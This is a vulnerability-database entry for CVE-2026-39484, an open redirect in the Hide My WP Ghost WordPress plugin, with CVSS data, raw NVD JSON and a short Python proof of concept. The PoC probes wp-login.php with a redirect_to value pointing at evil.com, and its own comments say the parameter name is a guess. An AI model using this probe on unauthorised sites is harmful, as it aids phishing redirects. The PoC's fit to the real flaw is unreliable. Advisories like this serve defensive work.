Security Vulnerability Report
中文
CVE-2026-39484 CVSS 4.7 MEDIUM

CVE-2026-39484

Published: 2026-04-08 09:16:23
Last Modified: 2026-04-24 18:08:35

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in John Darrel Hide My WP Ghost hide-my-wp allows Phishing.This issue affects Hide My WP Ghost: from n/a through < 7.0.00.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Hide My WP Ghost < 7.0.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-39484 (Open Redirect) # Target: Hide My WP Ghost < 7.0.00 import requests def check_open_redirect(target_domain): # The vulnerable endpoint often accepts a redirection parameter # Common parameter names in WP plugins include 'redirect_to', 'url', 'next', etc. # This example assumes a common implementation pattern. evil_site = "https://evil.com" # Construct the malicious payload # Note: The actual parameter name might need adjustment based on the specific plugin endpoint target_url = f"{target_domain}/wp-login.php?redirect_to={evil_site}" try: response = requests.get(target_url, allow_redirects=False) # Check if the response is a 302 Redirect and points to the external site if response.status_code == 302: location = response.headers.get('Location') if location and evil_site in location: return f"[+] Vulnerable! Redirecting to: {location}" else: return "[-] Not vulnerable or parameter incorrect." else: return "[-] No redirect detected." except Exception as e: return f"[!] Error: {e}" if __name__ == "__main__": # Replace with the actual target URL target = "http://example.com" print(check_open_redirect(target))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39484", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:23.110", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in John Darrel Hide My WP Ghost hide-my-wp allows Phishing.This issue affects Hide My WP Ghost: from n/a through < 7.0.00."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hide-my-wp/vulnerability/wordpress-hide-my-wp-ghost-plugin-7-0-00-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}